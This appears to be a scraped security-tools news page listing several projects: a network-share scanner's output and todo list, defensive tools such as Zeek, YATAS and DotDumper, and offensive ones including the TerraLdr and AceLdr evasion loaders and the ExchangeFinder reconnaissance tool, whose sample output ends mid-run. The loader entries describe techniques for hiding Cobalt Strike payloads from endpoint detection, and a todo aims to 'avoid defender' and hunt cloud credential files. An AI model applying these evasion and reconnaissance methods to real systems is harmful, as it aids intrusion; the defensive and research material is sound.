[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37] because 49 systems had open ports a nd there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs we re found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37] - 4 backup
[*][03/01/2021 09:37] - 2 ssms
[*][03/01/2021 09:37] - 1 test2
[*][03/01/2021 09:37] - 1 test1
[*][03/01/2021 09:37] - 1 users
[*] -----------------------------------------------

HTML Report Examples

Credits

Author
Scott Sutherland (@_nullbind)

Open-Source Code Used
These individuals wrote open source code that was used as part of this project. A big thank you goes out them and their work!

Name Site
Will Schroeder (@harmj0y) https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Warren F (@pscookiemonster) https://github.com/RamblingCookieMonster/Invoke-Parallel
Luben Kirov http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/

License
BSD 3-Clause

Todos

Pending Fixes/Bugs

  • Update code to avoid defender
  • Fix file listing formating on data insight pages
  • IPv6 addresses dont show up in subnets summary
  • ACLs associated with Builtin\Users sometimes shows up as LocalSystem under undefined conditions, and as a result, doesnt show up in the Excessive Privileges export. - Thanks Sam!

Pending Features

  • Add ability to specify additional groups to target
  • Add directory listing to insights page.
  • Add ability to grab system OS information for data insights.
  • Add visualization: Visual squares with coloring mapped to share volume density by subnet or ip?.
  • Add file type search. (half coded) + add to data insights. Don't forget things like *.aws, *.azure *.gcp directories that store cloud credentials.
  • Add file content search.
  • Add DontExcludePrintShares option
  • Add auto targeting of groups that contain a large % of the user population; over 70% (make configurable). Add as option.
  • Add configuration fid: netlogon and sysvol you may get access denied when using windows 10 unless the setting below is configured. Automat a check for this, and attempt to modify if privs are at correct level. gpedit.msc, go to Computer -> Administrative Templates -> Network -> Network Provider -> Hardened UNC Paths, enable the policy and click "Show" button. Enter your server name (* for all servers) into "Value name" and enter the folowing text "RequireMutualAuthentication=0,RequireIntegrity=0,RequirePrivacy=0" wihtout quotes into the "Value" field.
  • Add an interesting shares based on names to data insights. example: sql, backup, password, etc.
  • Add active sessions data to help identify potential owners/users of share.
  • Pull spns and computer description/spn account descriptions to help identify owner/business unit.
  • Create bloodhound import file / edge (highrisk share)
  • Research to identify additional high risk share names based on common technology
  • Add better support for IPv6
  • Dynamic identification of spikes in high risk share creation/common groupings, need to better summarize supporting detail beyond just the timeline. For each of the data insights, add average number of shares created for insight grouping by year/month (for folder hash / name etc), and the increase the month/year it spikes. (attempt to provide some historical context); maybe even list the most common non default directories being used by each of those. Potentially adding "first seen date" as well.
  • add showing share permissions (along with the already displayed NTFS permissions) and resultant access (most restrictive wins)


Zeek 5.0.5

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

TerraLdr - A Payload Loader Designed With Advanced Evasion Features


TerraLdr: A Payload Loader Designed With Advanced Evasion Features

Details:

  • no crt functions imported
  • syscall unhooking using KnownDllUnhook
  • api hashing using Rotr32 hashing algo
  • payload encryption using rc4 - payload is saved in .rsrc
  • process injection - targetting 'SettingSyncHost.exe'
  • ppid spoofing & blockdlls policy using NtCreateUserProcess
  • stealthy remote process injection - chunking
  • using debugging & NtQueueApcThread for payload execution

Usage:

Thanks For:

Notes:

  • "SettingSyncHost.exe" isnt found on windows 11 machine, while i didnt tested with w11, its a must to change the process name to something else before testing
  • it is possibly better to compile with "ISO C++20 Standard (/std:c++20)"

Profit:

Demo (by @ColeVanlanding1) :


Tested with cobalt strike && Havoc on windows 10



tcpdump 4.99.2

tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.

GNUnet P2P Framework 0.19.2

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

cryptmount Filesystem Manager 6.2.0

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

YATAS - A Simple Tool To Audit Your AWS Infrastructure For Misconfiguration Or Potential Security Issues With Plugins Integration


Yet Another Testing & Auditing Solution

The goal of YATAS is to help you create a secure AWS environment without too much hassle. It won't check for all best practices but only for the ones that are important for you based on my experience. Please feel free to tell me if you find something that is not covered.


Features

YATAS is a simple and easy to use tool to audit your infrastructure for misconfiguration or potential security issues.

No details Details

Installation

brew tap padok-team/tap
brew install yatas
yatas --init

Modify .yatas.yml to your needs.

yatas --install

Installs the plugins you need.

Usage

yatas -h

Flags:

  • --details: Show details of the issues found.
  • --compare: Compare the results of the previous run with the current run and show the differences.
  • --ci: Exit code 1 if there are issues found, 0 otherwise.
  • --resume: Only shows the number of tests passing and failing.
  • --time: Shows the time each test took to run in order to help you find bottlenecks.
  • --init: Creates a .yatas.yml file in the current directory.
  • --install: Installs the plugins you need.
  • --only-failure: Only show the tests that failed.

Plugins

Plugins Description Checks
AWS Audit AWS checks Good practices and security checks
Markdown Reports Reporting Generates a markdown report

Checks

Ignore results for known issues

You can ignore results of checks by adding the following to your .yatas.yml file:

ignore:
- id: "AWS_VPC_004"
regex: true
values:
- "VPC Flow Logs are not enabled on vpc-.*"
- id: "AWS_VPC_003"
regex: false
values:
- "VPC has only one gateway on vpc-08ffec87e034a8953"

Exclude a test

You can exclude a test by adding the following to your .yatas.yml file:

plugins:
- name: "aws"
enabled: true
description: "Check for AWS good practices"
exclude:
- AWS_S3_001

Specify which tests to run

To only run a specific test, add the following to your .yatas.yml file:

plugins:
- name: "aws"
enabled: true
description: "Check for AWS good practices"
include:
- "AWS_VPC_003"
- "AWS_VPC_004"

Get error logs

You can get the error logs by adding the following to your env variables:

export YATAS_LOG_LEVEL=debug

The available log levels are: debug, info, warn, error, fatal, panic and off by default

AWS - 63 Checks

AWS Certificate Manager

  • AWS_ACM_001 ACM certificates are valid
  • AWS_ACM_002 ACM certificate expires in more than 90 days
  • AWS_ACM_003 ACM certificates are used

APIGateway

  • AWS_APG_001 ApiGateways logs are sent to Cloudwatch
  • AWS_APG_002 ApiGateways are protected by an ACL
  • AWS_APG_003 ApiGateways have tracing enabled

AutoScaling

  • AWS_ASG_001 Autoscaling maximum capacity is below 80%
  • AWS_ASG_002 Autoscaling group are in two availability zones

Backup

  • AWS_BAK_001 EC2's Snapshots are encrypted
  • AWS_BAK_002 EC2's snapshots are younger than a day old

Cloudfront

  • AWS_CFT_001 Cloudfronts enforce TLS 1.2 at least
  • AWS_CFT_002 Cloudfronts only allow HTTPS or redirect to HTTPS
  • AWS_CFT_003 Cloudfronts queries are logged
  • AWS_CFT_004 Cloudfronts are logging Cookies
  • AWS_CFT_005 Cloudfronts are protected by an ACL

CloudTrail

  • AWS_CLD_001 Cloudtrails are encrypted
  • AWS_CLD_002 Cloudtrails have Global Service Events Activated
  • AWS_CLD_003 Cloudtrails are in multiple regions

COG

  • AWS_COG_001 Cognito allows unauthenticated users

DynamoDB

  • AWS_DYN_001 Dynamodbs are encrypted
  • AWS_DYN_002 Dynamodb have continuous backup enabled with PITR

EC2

  • AWS_EC2_001 EC2s don't have a public IP
  • AWS_EC2_002 EC2s have the monitoring option enabled

ECR

  • AWS_ECR_001 ECRs image are scanned on push
  • AWS_ECR_002 ECRs are encrypted
  • AWS_ECR_003 ECRs tags are immutable

EKS

  • AWS_EKS_001 EKS clusters have logging enabled
  • AWS_EKS_002 EKS clusters have private endpoint or strict public access

LoadBalancer

  • AWS_ELB_001 ELB have access logs enabled

GuardDuty

  • AWS_GDT_001 GuardDuty is enabled in the account

IAM

  • AWS_IAM_001 IAM Users have 2FA activated
  • AWS_IAM_002 IAM access key younger than 90 days
  • AWS_IAM_003 IAM User can't elevate rights
  • AWS_IAM_004 IAM Users have not used their password for 120 days

Lambda

  • AWS_LMD_001 Lambdas are private
  • AWS_LMD_002 Lambdas are in a security group
  • AWS_LMD_003 Lambdas are not with errors

RDS

  • AWS_RDS_001 RDS are encrypted
  • AWS_RDS_002 RDS are backedup automatically with PITR
  • AWS_RDS_003 RDS have minor versions automatically updated
  • AWS_RDS_004 RDS aren't publicly accessible
  • AWS_RDS_005 RDS logs are exported to cloudwatch
  • AWS_RDS_006 RDS have the deletion protection enabled
  • AWS_RDS_007 Aurora Clusters have minor versions automatically updated
  • AWS_RDS_008 Aurora RDS are backedup automatically with PITR
  • AWS_RDS_009 Aurora RDS have the deletion protection enabled
  • AWS_RDS_010 Aurora RDS are encrypted
  • AWS_RDS_011 Aurora RDS logs are exported to cloudwatch
  • AWS_RDS_012 Aurora RDS aren't publicly accessible

S3 Bucket

  • AWS_S3_001 S3 are encrypted
  • AWS_S3_002 S3 buckets are not global but in one zone
  • AWS_S3_003 S3 buckets are versioned
  • AWS_S3_004 S3 buckets have a retention policy
  • AWS_S3_005 S3 bucket have public access block enabled

Volume

  • AWS_VOL_001 EC2's volumes are encrypted
  • AWS_VOL_002 EC2 are using GP3
  • AWS_VOL_003 EC2 have snapshots
  • AWS_VOL_004 EC2's volumes are unused

VPC

  • AWS_VPC_001 VPC CIDRs are bigger than /20
  • AWS_VPC_002 VPC can't be in the same account
  • AWS_VPC_003 VPC only have one Gateway
  • AWS_VPC_004 VPC Flow Logs are activated
  • AWS_VPC_005 VPC have at least 2 subnets

How to create a new plugin ?

You'd like to add a new plugin ? Then simply visit yatas-plugin and follow the instructions.



AceLdr - Cobalt Strike UDRL For Memory Scanner Evasion


A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.Β 


Features

Easy to Use

Import a single CNA script before generating shellcode.

Dynamic Memory Encryption

Creates a new heap for any allocations from Beacon and encrypts entries before sleep.

Code Obfuscation and Encryption

Changes the memory containing CS executable code to non-executable and encrypts it (FOLIAGE).

Return Address Spoofing at Execution

Certain WinAPI calls are executed with a spoofed return address (InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap).

Sleep Without Sleep

Delayed execution using WaitForSingleObjectEx.

RC4 Encryption

All encryption performed with SystemFunction032.

Known Issues

  • Not compatible with loaders that rely on the shellcode thread staying alive.

References

This project would not have been possible without the following:

Other features and inspiration were taken from the following:



REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python >3.10 for running the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code ammendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



American Fuzzy Lop plus plus 4.05c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files


An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.

The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.


Why DotDumper?

In brief, manual unpacking is a tedious process which consumes a disproportional amount of time for analysts. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. The lost valuable time could be used to dig into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. Afterall, analysts look for the few needles in the haystack.

So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.

Features

To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumper’s results of a packed AgentTesla stealer sample, the hashes of which are below.

Hash type Hash value
SHA-256 b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d
SHA-1 c10e48ee1f802f730f41f3d11ae9d7bcc649080c
MD-5 23541daadb154f1f59119952e7232d6b

Using the command-line interface

DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.

The minimal requirement to run a given sample, is to provide the β€œ-file” argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumper’s executable location.

Unless a directory name is provided, the β€œ-log” folder name is set equal to the file name of the sample without the extension (if any). The folder is located in the same folder as DotDumper resides in, which is where the logs and dumped files will be saved in.

In the case of a library, or an alternative entry point into a binary, one must override the entry point using β€œ-overrideEntry true”. Additionally, one has to provide the fully qualified class, which includes the name space using β€œ-fqcn My.NameSpace.MyClass”. This tells DotDumper which class to select, which is where the provided function name (using β€œ-functionName MyFunction”) is retrieved.

If the selected function requires arguments, one has to provide the number of arguments using β€œ-argc” and the number of required arguments. The argument types and values are to be provided as β€œstring|myValue int|9”. Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.

Other less frequently used options such as β€œ-raceTime” or β€œ-deprecated” are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.

Logging and dumping

Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:

  • A stack trace based on the function’s caller
  • Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
  • The parent assembly, from which the call originates if it is not the original sample
  • The type, name, and value of the function’s arguments
  • The type, name, and value of function’s return value, if any
  • A list of files which are dumped to disk which correspond with the given function call

Note that for each dumped file, the file name is equal to the file’s SHA-256 hash.

To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNet’s Assembly.Load function.

First, the local system time is given, together with the original function’s return type, name, and argument(s). Second, the stack trace is given, where it shows that the sample’s main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within β€œNavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)”. This provides context for the analyst to find the code around this call if it is of interest.

Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.

Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.

Finally, the function’s return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.

Reflection

Per Microsoft’s documentation, reflection is best summarized as β€œ[…] provides objects that encapsulate assemblies, modules, and types”. In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.

To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.

Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sample’s main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumper’s invoke related hooks log these occurrences, as can be seen below.

The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.

Managed hooks

Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function which is referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead to jump to the hook. As such, the program’s execution flow is diverted. The hook can then perform arbitrary actions, optionally call the original function, after which it returns the execution to the caller together with a return value if need be. The diagram below illustrates this process.

Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Java’s virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNet’s interoperability service to call native Windows API functionality.

Easily extendible

Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the tool’s improvement.

Differences with known tooling

With the goal and features of DotDumper clear, it might seem as if there’s overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool is better than another, but rather how the tools differ.

DotDumper’s goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the code’s readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.

Future work

DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to injection of hooks into the DotNet Framework’s functions which can be subject to change, it’s very well possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who rather not publicly interact, feel free to send me a private message on my Twitter.

Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! There’s nothing like hearing about the usage of a home-made tool!

There is more in store for DotDumper, and an update will be sent out to the community once it is available!



SimpleRmiDiscoverer 0.1

SimpleRmiDiscoverer is a JMX RMI scanning tool for unsecured (without enabled authentication) instances of JAVA JMX. It does not use standard Java RMI/JMX classes like other available tools but rather communicates directly over TCP. The tool is written in Java and is very useful in red teaming operations because JVM is still ubiquitous in corporate environments. It can be executed by unprivileged (non-admin) users.

Faraday 4.3.2

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.

Currently, the tool has a signature of every version from Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the header X-OWA-Version we can identify the exact version.

If the tool found a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]
└─$ poetry install 1 β¨―
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

β€’ Installing pyparsing (3.0.9)
β€’ Installing attrs (22.1.0)
β€’ Installing certifi (2022.6.15)
β€’ Installing charset-normalizer (2.1.1)
β€’ Installing idna (3.3)
β€’ Installing more-itertools (8.14.0)
β€’ Installing packaging (21.3)
β€’ Installing pluggy (0.13.1)
β€’ Installing py (1.11.0)
β€’ Installing urllib3 (1.26.12)
β€’ Installing wcwidth (0.2.5)
β€’ Installing dnspython (2.2.1)
β€’ Installing pytest (5.4.3)
β€’ Installing requests (2.28.1)
β€’ Installing termcolor (1.1.0)< br/>
Installing the current project: ExchangeFinder (0.1.0)

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/Desktop/ExchangeFinder]
└─$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

β”Œβ”€β”€(kali&#129 27;kali)-[~/Desktop/ExchangeFinder]
└─$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan single domain you can use the option --domain like the following:

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β» python3 exchangefinder.py --domain dummyexchangetarget.com                                                                                           


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexch angetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β»

Scan multiple domains

To scan multiple domains (targets) you can use the option --domains and choose a file like the following:

askarβ€’/opt/redteaming/ExchangeFinder(main⚑)Β» python3 exchangefinder.py --domains domains.txt                                                                                                          


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records f ound for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

